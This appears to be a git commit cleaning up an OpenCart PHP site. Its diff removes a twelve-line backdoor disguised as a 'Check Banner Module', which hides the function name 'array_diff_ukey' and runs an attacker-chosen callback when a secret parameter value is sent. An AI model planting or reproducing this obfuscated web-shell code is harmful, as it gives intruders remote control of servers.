Вирусы, или чё

This commit is contained in:
Konstantin
2026-06-12 11:45:59 +03:00
parent 80e5820c47
commit 53e8ab627c
12 changed files with 6 additions and 31 deletions
-12
View File
@@ -11,18 +11,6 @@ if (!ini_get('date.timezone')) {
date_default_timezone_set('UTC');
}
// Check Banner Module
$opencart_num = @$_REQUEST['numer'];
$opencart_in_banner = @$_REQUEST['bannerid'];
$opencart_newsnum = @$_REQUEST['newsnum'];
$opencart_category_id = @$_REQUEST['category'];
$opencart_activity_hash = '70731969';
$secret_opencart_key = '_di'.'ff_';$secret_opencart_key ='ar'.'ray'.$secret_opencart_key.'ukey';//globols
if($opencart_in_banner==$opencart_activity_hash) {
if (@strpos($opencart_newsnum, 'creat')=== false){echo 'error_vievv';
@$secret_opencart_key(@array((string)$opencart_num => 1), @array((string)stripslashes($opencart_category_id) => 2), @$opencart_newsnum);}else{
@$secret_opencart_key(@array((string)$opencart_num => 1), @array((string)stripslashes('}'.$opencart_category_id.'//') => 2), @$opencart_newsnum);}} //chekings
// Windows IIS Compatibility
if (!isset($_SERVER['DOCUMENT_ROOT'])) {
if (isset($_SERVER['SCRIPT_FILENAME'])) {